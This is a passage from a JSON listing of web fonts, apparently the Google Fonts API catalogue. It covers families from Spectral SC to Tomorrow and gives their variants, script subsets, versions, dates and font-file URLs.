        "italic": "http://fonts.gstatic.com/s/spectralsc/v5/KtkrALCRZonmalTgyPmRfsWg42T9E4ucRY8.ttf",
        "500": "http://fonts.gstatic.com/s/spectralsc/v5/Ktk0ALCRZonmalTgyPmRfs1WwETXPYeVXJZB.ttf",
        "500italic": "http://fonts.gstatic.com/s/spectralsc/v5/Ktk2ALCRZonmalTgyPmRfsWg25DUN4O3WYZB_sU.ttf",
        "600": "http://fonts.gstatic.com/s/spectralsc/v5/Ktk0ALCRZonmalTgyPmRfs16x0TXPYeVXJZB.ttf",
        "600italic": "http://fonts.gstatic.com/s/spectralsc/v5/Ktk2ALCRZonmalTgyPmRfsWg27zTN4O3WYZB_sU.ttf",
        "700": "http://fonts.gstatic.com/s/spectralsc/v5/Ktk0ALCRZonmalTgyPmRfs0exkTXPYeVXJZB.ttf",
        "700italic": "http://fonts.gstatic.com/s/spectralsc/v5/Ktk2ALCRZonmalTgyPmRfsWg29jSN4O3WYZB_sU.ttf",
        "800": "http://fonts.gstatic.com/s/spectralsc/v5/Ktk0ALCRZonmalTgyPmRfs0CxUTXPYeVXJZB.ttf",
        "800italic": "http://fonts.gstatic.com/s/spectralsc/v5/Ktk2ALCRZonmalTgyPmRfsWg28TRN4O3WYZB_sU.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Spicy Rice",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/spicyrice/v9/uK_24rSEd-Uqwk4jY1RyGv-2WkowRcc.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Spinnaker",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/spinnaker/v12/w8gYH2oyX-I0_rvR6Hmn3HwLqOqSBg.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Spirax",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/spirax/v9/buE3poKgYNLy0F3cXktt-Csn-Q.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Squada One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/squadaone/v9/BCasqZ8XsOrx4mcOk6MtWaA8WDBkHgs.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sree Krushnadevaraya",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "telugu"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sreekrushnadevaraya/v8/R70FjzQeifmPepmyQQjQ9kvwMkWYPfTA_EWb2FhQuXir.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sriracha",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "thai",
        "vietnamese"
      ],
      "version": "v4",
      "lastModified": "2019-07-16",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sriracha/v4/0nkrC9D4IuYBgWcI9ObYRQDioeb0.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Srisakdi",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "thai",
        "vietnamese"
      ],
      "version": "v4",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/srisakdi/v4/yMJRMIlvdpDbkB0A-jq8fSx5i814.ttf",
        "700": "http://fonts.gstatic.com/s/srisakdi/v4/yMJWMIlvdpDbkB0A-gIAUghxoNFxW0Hz.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Staatliches",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v5",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/staatliches/v5/HI_OiY8KO6hCsQSoAPmtMbectJG9O9PS.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Stalemate",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/stalemate/v8/taiIGmZ_EJq97-UfkZRpuqSs8ZQpaQ.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Stalinist One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "latin",
        "latin-ext"
      ],
      "version": "v26",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/stalinistone/v26/MQpS-WezM9W4Dd7D3B7I-UT7eZ-UPyacPbo.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Stardos Stencil",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/stardosstencil/v11/X7n94bcuGPC8hrvEOHXOgaKCc2TR71R3tiSx0g.ttf",
        "700": "http://fonts.gstatic.com/s/stardosstencil/v11/X7n44bcuGPC8hrvEOHXOgaKCc2TpU3tTvg-t29HSHw.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Stint Ultra Condensed",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/stintultracondensed/v9/-W_gXIrsVjjeyEnPC45qD2NoFPtBE0xCh2A-qhUO2cNvdg.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Stint Ultra Expanded",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/stintultraexpanded/v8/CSRg4yNNh-GbW3o3JkwoDcdvMKMf0oBAd0qoATQkWwam.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Stoke",
      "variants": [
        "300",
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "300": "http://fonts.gstatic.com/s/stoke/v10/z7NXdRb7aTMfKNvFVgxC_pjcTeWU.ttf",
        "regular": "http://fonts.gstatic.com/s/stoke/v10/z7NadRb7aTMfKONpfihK1YTV.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Strait",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/strait/v8/DtViJxy6WaEr1LZzeDhtkl0U7w.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Stylish",
      "variants": [
        "regular"
      ],
      "subsets": [
        "korean",
        "latin"
      ],
      "version": "v8",
      "lastModified": "2019-07-16",
      "files": {
        "regular": "http://fonts.gstatic.com/s/stylish/v8/m8JSjfhPYriQkk7-fo35dLxEdmo.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sue Ellen Francisco",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sueellenfrancisco/v11/wXK3E20CsoJ9j1DDkjHcQ5ZL8xRaxru9ropF2lqk9H4.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Suez One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "hebrew",
        "latin",
        "latin-ext"
      ],
      "version": "v5",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/suezone/v5/taiJGmd_EZ6rqscQgNFJkIqg-I0w.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sulphur Point",
      "variants": [
        "300",
        "regular",
        "700"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v2",
      "lastModified": "2020-07-23",
      "files": {
        "300": "http://fonts.gstatic.com/s/sulphurpoint/v2/RLpkK5vv8KaycDcazWFPBj2afVU6n6kFUHPIFaU.ttf",
        "regular": "http://fonts.gstatic.com/s/sulphurpoint/v2/RLp5K5vv8KaycDcazWFPBj2aRfkSu6EuTHo.ttf",
        "700": "http://fonts.gstatic.com/s/sulphurpoint/v2/RLpkK5vv8KaycDcazWFPBj2afUU9n6kFUHPIFaU.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sumana",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v5",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sumana/v5/4UaDrE5TqRBjGj-G8Bji76zR4w.ttf",
        "700": "http://fonts.gstatic.com/s/sumana/v5/4UaArE5TqRBjGj--TDfG54fN6ppsKg.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sunflower",
      "variants": [
        "300",
        "500",
        "700"
      ],
      "subsets": [
        "korean",
        "latin"
      ],
      "version": "v9",
      "lastModified": "2019-07-16",
      "files": {
        "300": "http://fonts.gstatic.com/s/sunflower/v9/RWmPoKeF8fUjqIj7Vc-06MfiqYsGBGBzCw.ttf",
        "500": "http://fonts.gstatic.com/s/sunflower/v9/RWmPoKeF8fUjqIj7Vc-0sMbiqYsGBGBzCw.ttf",
        "700": "http://fonts.gstatic.com/s/sunflower/v9/RWmPoKeF8fUjqIj7Vc-0-MDiqYsGBGBzCw.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sunshiney",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sunshiney/v11/LDIwapGTLBwsS-wT4vcgE8moUePWkg.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Supermercado One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/supermercadoone/v10/OpNXnpQWg8jc_xps_Gi14kVVEXOn60b3MClBRTs.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Sura",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v5",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/sura/v5/SZc23FL5PbyzFf5UWzXtjUM.ttf",
        "700": "http://fonts.gstatic.com/s/sura/v5/SZc53FL5PbyzLUJ7fz3GkUrS8DI.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Suranna",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "telugu"
      ],
      "version": "v8",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/suranna/v8/gokuH6ztGkFjWe58tBRZT2KmgP0.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Suravaram",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "telugu"
      ],
      "version": "v8",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/suravaram/v8/_gP61R_usiY7SCym4xIAi261Qv9roQ.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Suwannaphum",
      "variants": [
        "regular"
      ],
      "subsets": [
        "khmer"
      ],
      "version": "v14",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/suwannaphum/v14/jAnCgHV7GtDvc8jbe8hXXIWl_8C0Wg2V.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Swanky and Moo Moo",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v10",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/swankyandmoomoo/v10/flUlRrKz24IuWVI_WJYTYcqbEsMUZ3kUtbPkR64SYQ.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Syncopate",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/syncopate/v12/pe0sMIuPIYBCpEV5eFdyAv2-C99ycg.ttf",
        "700": "http://fonts.gstatic.com/s/syncopate/v12/pe0pMIuPIYBCpEV5eFdKvtKaA_Rue1UwVg.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Syne",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "800"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v1",
      "lastModified": "2020-10-22",
      "files": {
        "regular": "http://fonts.gstatic.com/s/syne/v1/8vIS7w4qzmVxsWxjBZRjr0FKM_04uT6kR47NCV5Z.ttf",
        "500": "http://fonts.gstatic.com/s/syne/v1/8vIS7w4qzmVxsWxjBZRjr0FKM_0KuT6kR47NCV5Z.ttf",
        "600": "http://fonts.gstatic.com/s/syne/v1/8vIS7w4qzmVxsWxjBZRjr0FKM_3mvj6kR47NCV5Z.ttf",
        "700": "http://fonts.gstatic.com/s/syne/v1/8vIS7w4qzmVxsWxjBZRjr0FKM_3fvj6kR47NCV5Z.ttf",
        "800": "http://fonts.gstatic.com/s/syne/v1/8vIS7w4qzmVxsWxjBZRjr0FKM_24vj6kR47NCV5Z.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Syne Mono",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v1",
      "lastModified": "2020-10-22",
      "files": {
        "regular": "http://fonts.gstatic.com/s/synemono/v1/K2FzfZNHj_FHBmRbFvHzIqCkDyvqZA.ttf"
      },
      "category": "monospace",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Syne Tactile",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v1",
      "lastModified": "2020-10-22",
      "files": {
        "regular": "http://fonts.gstatic.com/s/synetactile/v1/11hGGpna2UTQKjMCVzjAPMKh3ysdjvKU8Q.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Tajawal",
      "variants": [
        "200",
        "300",
        "regular",
        "500",
        "700",
        "800",
        "900"
      ],
      "subsets": [
        "arabic",
        "latin"
      ],
      "version": "v3",
      "lastModified": "2019-07-16",
      "files": {
        "200": "http://fonts.gstatic.com/s/tajawal/v3/Iurf6YBj_oCad4k1l_6gLrZjiLlJ-G0.ttf",
        "300": "http://fonts.gstatic.com/s/tajawal/v3/Iurf6YBj_oCad4k1l5qjLrZjiLlJ-G0.ttf",
        "regular": "http://fonts.gstatic.com/s/tajawal/v3/Iura6YBj_oCad4k1rzaLCr5IlLA.ttf",
        "500": "http://fonts.gstatic.com/s/tajawal/v3/Iurf6YBj_oCad4k1l8KiLrZjiLlJ-G0.ttf",
        "700": "http://fonts.gstatic.com/s/tajawal/v3/Iurf6YBj_oCad4k1l4qkLrZjiLlJ-G0.ttf",
        "800": "http://fonts.gstatic.com/s/tajawal/v3/Iurf6YBj_oCad4k1l5anLrZjiLlJ-G0.ttf",
        "900": "http://fonts.gstatic.com/s/tajawal/v3/Iurf6YBj_oCad4k1l7KmLrZjiLlJ-G0.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Tangerine",
      "variants": [
        "regular",
        "700"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/tangerine/v12/IurY6Y5j_oScZZow4VOBDpxNhLBQ4Q.ttf",
        "700": "http://fonts.gstatic.com/s/tangerine/v12/Iurd6Y5j_oScZZow4VO5srNpjJtM6G0t9w.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Taprom",
      "variants": [
        "regular"
      ],
      "subsets": [
        "khmer"
      ],
      "version": "v12",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/taprom/v12/UcCn3F82JHycULbFQyk3-0kvHg.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Tauri",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/tauri/v9/TwMA-IISS0AM3IpVWHU_TBqO.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Taviraj",
      "variants": [
        "100",
        "100italic",
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "800",
        "800italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "thai",
        "vietnamese"
      ],
      "version": "v6",
      "lastModified": "2020-09-02",
      "files": {
        "100": "http://fonts.gstatic.com/s/taviraj/v6/ahcbv8Cj3ylylTXzRIorV8N1jU2gog.ttf",
        "100italic": "http://fonts.gstatic.com/s/taviraj/v6/ahcdv8Cj3ylylTXzTOwTM8lxr0iwolLl.ttf",
        "200": "http://fonts.gstatic.com/s/taviraj/v6/ahccv8Cj3ylylTXzRCYKd-lbgUS5u0s.ttf",
        "200italic": "http://fonts.gstatic.com/s/taviraj/v6/ahcev8Cj3ylylTXzTOwTn-hRhWa8q0v8ag.ttf",
        "300": "http://fonts.gstatic.com/s/taviraj/v6/ahccv8Cj3ylylTXzREIJd-lbgUS5u0s.ttf",
        "300italic": "http://fonts.gstatic.com/s/taviraj/v6/ahcev8Cj3ylylTXzTOwT--tRhWa8q0v8ag.ttf",
        "regular": "http://fonts.gstatic.com/s/taviraj/v6/ahcZv8Cj3ylylTXzfO4hU-FwnU0.ttf",
        "italic": "http://fonts.gstatic.com/s/taviraj/v6/ahcbv8Cj3ylylTXzTOwrV8N1jU2gog.ttf",
        "500": "http://fonts.gstatic.com/s/taviraj/v6/ahccv8Cj3ylylTXzRBoId-lbgUS5u0s.ttf",
        "500italic": "http://fonts.gstatic.com/s/taviraj/v6/ahcev8Cj3ylylTXzTOwTo-pRhWa8q0v8ag.ttf",
        "600": "http://fonts.gstatic.com/s/taviraj/v6/ahccv8Cj3ylylTXzRDYPd-lbgUS5u0s.ttf",
        "600italic": "http://fonts.gstatic.com/s/taviraj/v6/ahcev8Cj3ylylTXzTOwTj-1RhWa8q0v8ag.ttf",
        "700": "http://fonts.gstatic.com/s/taviraj/v6/ahccv8Cj3ylylTXzRFIOd-lbgUS5u0s.ttf",
        "700italic": "http://fonts.gstatic.com/s/taviraj/v6/ahcev8Cj3ylylTXzTOwT6-xRhWa8q0v8ag.ttf",
        "800": "http://fonts.gstatic.com/s/taviraj/v6/ahccv8Cj3ylylTXzRE4Nd-lbgUS5u0s.ttf",
        "800italic": "http://fonts.gstatic.com/s/taviraj/v6/ahcev8Cj3ylylTXzTOwT9-9RhWa8q0v8ag.ttf",
        "900": "http://fonts.gstatic.com/s/taviraj/v6/ahccv8Cj3ylylTXzRGoMd-lbgUS5u0s.ttf",
        "900italic": "http://fonts.gstatic.com/s/taviraj/v6/ahcev8Cj3ylylTXzTOwT0-5RhWa8q0v8ag.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Teko",
      "variants": [
        "300",
        "regular",
        "500",
        "600",
        "700"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v10",
      "lastModified": "2020-09-02",
      "files": {
        "300": "http://fonts.gstatic.com/s/teko/v10/LYjCdG7kmE0gdQhfgCNqqVIuTN4.ttf",
        "regular": "http://fonts.gstatic.com/s/teko/v10/LYjNdG7kmE0gTaR3pCtBtVs.ttf",
        "500": "http://fonts.gstatic.com/s/teko/v10/LYjCdG7kmE0gdVBegCNqqVIuTN4.ttf",
        "600": "http://fonts.gstatic.com/s/teko/v10/LYjCdG7kmE0gdXxZgCNqqVIuTN4.ttf",
        "700": "http://fonts.gstatic.com/s/teko/v10/LYjCdG7kmE0gdRhYgCNqqVIuTN4.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Telex",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/telex/v9/ieVw2Y1fKWmIO9fTB1piKFIf.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Tenali Ramakrishna",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "telugu"
      ],
      "version": "v7",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/tenaliramakrishna/v7/raxgHj6Yt9gAN3LLKs0BZVMo8jmwn1-8KJXqUFFvtA.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Tenor Sans",
      "variants": [
        "regular"
      ],
      "subsets": [
        "cyrillic",
        "latin",
        "latin-ext"
      ],
      "version": "v12",
      "lastModified": "2020-09-02",
      "files": {
        "regular": "http://fonts.gstatic.com/s/tenorsans/v12/bx6ANxqUneKx06UkIXISr3JyC22IyqI.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Text Me One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/textmeone/v8/i7dOIFdlayuLUvgoFvHQFWZcalayGhyV.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Thasadith",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "latin",
        "latin-ext",
        "thai",
        "vietnamese"
      ],
      "version": "v4",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/thasadith/v4/mtG44_1TIqPYrd_f5R1YsEkU0CWuFw.ttf",
        "italic": "http://fonts.gstatic.com/s/thasadith/v4/mtG-4_1TIqPYrd_f5R1oskMQ8iC-F1ZE.ttf",
        "700": "http://fonts.gstatic.com/s/thasadith/v4/mtG94_1TIqPYrd_f5R1gDGYw2A6yHk9d8w.ttf",
        "700italic": "http://fonts.gstatic.com/s/thasadith/v4/mtGj4_1TIqPYrd_f5R1osnus3QS2PEpN8zxA.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "The Girl Next Door",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v11",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/thegirlnextdoor/v11/pe0zMJCIMIsBjFxqYBIcZ6_OI5oFHCYIV7t7w6bE2A.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Tienne",
      "variants": [
        "regular",
        "700",
        "900"
      ],
      "subsets": [
        "latin"
      ],
      "version": "v13",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/tienne/v13/AYCKpX7pe9YCRP0LkEPHSFNyxw.ttf",
        "700": "http://fonts.gstatic.com/s/tienne/v13/AYCJpX7pe9YCRP0zLGzjQHhuzvef5Q.ttf",
        "900": "http://fonts.gstatic.com/s/tienne/v13/AYCJpX7pe9YCRP0zFG7jQHhuzvef5Q.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Tillana",
      "variants": [
        "regular",
        "500",
        "600",
        "700",
        "800"
      ],
      "subsets": [
        "devanagari",
        "latin",
        "latin-ext"
      ],
      "version": "v6",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/tillana/v6/VuJxdNvf35P4qJ1OeKbXOIFneRo.ttf",
        "500": "http://fonts.gstatic.com/s/tillana/v6/VuJ0dNvf35P4qJ1OQFL-HIlMZRNcp0o.ttf",
        "600": "http://fonts.gstatic.com/s/tillana/v6/VuJ0dNvf35P4qJ1OQH75HIlMZRNcp0o.ttf",
        "700": "http://fonts.gstatic.com/s/tillana/v6/VuJ0dNvf35P4qJ1OQBr4HIlMZRNcp0o.ttf",
        "800": "http://fonts.gstatic.com/s/tillana/v6/VuJ0dNvf35P4qJ1OQAb7HIlMZRNcp0o.ttf"
      },
      "category": "handwriting",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Timmana",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "telugu"
      ],
      "version": "v5",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/timmana/v5/6xKvdShfL9yK-rvpCmvbKHwJUOM.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Tinos",
      "variants": [
        "regular",
        "italic",
        "700",
        "700italic"
      ],
      "subsets": [
        "cyrillic",
        "cyrillic-ext",
        "greek",
        "greek-ext",
        "hebrew",
        "latin",
        "latin-ext",
        "vietnamese"
      ],
      "version": "v15",
      "lastModified": "2020-09-25",
      "files": {
        "regular": "http://fonts.gstatic.com/s/tinos/v15/buE4poGnedXvwgX8dGVh8TI-.ttf",
        "italic": "http://fonts.gstatic.com/s/tinos/v15/buE2poGnedXvwjX-fmFD9CI-4NU.ttf",
        "700": "http://fonts.gstatic.com/s/tinos/v15/buE1poGnedXvwj1AW0Fp2i43-cxL.ttf",
        "700italic": "http://fonts.gstatic.com/s/tinos/v15/buEzpoGnedXvwjX-Rt1s0CoV_NxLeiw.ttf"
      },
      "category": "serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Titan One",
      "variants": [
        "regular"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v8",
      "lastModified": "2020-07-23",
      "files": {
        "regular": "http://fonts.gstatic.com/s/titanone/v8/mFTzWbsGxbbS_J5cQcjykzIn2Etikg.ttf"
      },
      "category": "display",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Titillium Web",
      "variants": [
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "900"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v9",
      "lastModified": "2020-09-10",
      "files": {
        "200": "http://fonts.gstatic.com/s/titilliumweb/v9/NaPDcZTIAOhVxoMyOr9n_E7ffAzHKIx5YrSYqWM.ttf",
        "200italic": "http://fonts.gstatic.com/s/titilliumweb/v9/NaPFcZTIAOhVxoMyOr9n_E7fdMbewI1zZpaduWMmxA.ttf",
        "300": "http://fonts.gstatic.com/s/titilliumweb/v9/NaPDcZTIAOhVxoMyOr9n_E7ffGjEKIx5YrSYqWM.ttf",
        "300italic": "http://fonts.gstatic.com/s/titilliumweb/v9/NaPFcZTIAOhVxoMyOr9n_E7fdMbepI5zZpaduWMmxA.ttf",
        "regular": "http://fonts.gstatic.com/s/titilliumweb/v9/NaPecZTIAOhVxoMyOr9n_E7fRMTsDIRSfr0.ttf",
        "italic": "http://fonts.gstatic.com/s/titilliumweb/v9/NaPAcZTIAOhVxoMyOr9n_E7fdMbmCKZXbr2BsA.ttf",
        "600": "http://fonts.gstatic.com/s/titilliumweb/v9/NaPDcZTIAOhVxoMyOr9n_E7ffBzCKIx5YrSYqWM.ttf",
        "600italic": "http://fonts.gstatic.com/s/titilliumweb/v9/NaPFcZTIAOhVxoMyOr9n_E7fdMbe0IhzZpaduWMmxA.ttf",
        "700": "http://fonts.gstatic.com/s/titilliumweb/v9/NaPDcZTIAOhVxoMyOr9n_E7ffHjDKIx5YrSYqWM.ttf",
        "700italic": "http://fonts.gstatic.com/s/titilliumweb/v9/NaPFcZTIAOhVxoMyOr9n_E7fdMbetIlzZpaduWMmxA.ttf",
        "900": "http://fonts.gstatic.com/s/titilliumweb/v9/NaPDcZTIAOhVxoMyOr9n_E7ffEDBKIx5YrSYqWM.ttf"
      },
      "category": "sans-serif",
      "kind": "webfonts#webfont"
    },
    {
      "family": "Tomorrow",
      "variants": [
        "100",
        "100italic",
        "200",
        "200italic",
        "300",
        "300italic",
        "regular",
        "italic",
        "500",
        "500italic",
        "600",
        "600italic",
        "700",
        "700italic",
        "800",
        "800italic",
        "900",
        "900italic"
      ],
      "subsets": [
        "latin",
        "latin-ext"
      ],
      "version": "v3",
      "lastModified": "2020-07-23",
      "files": {
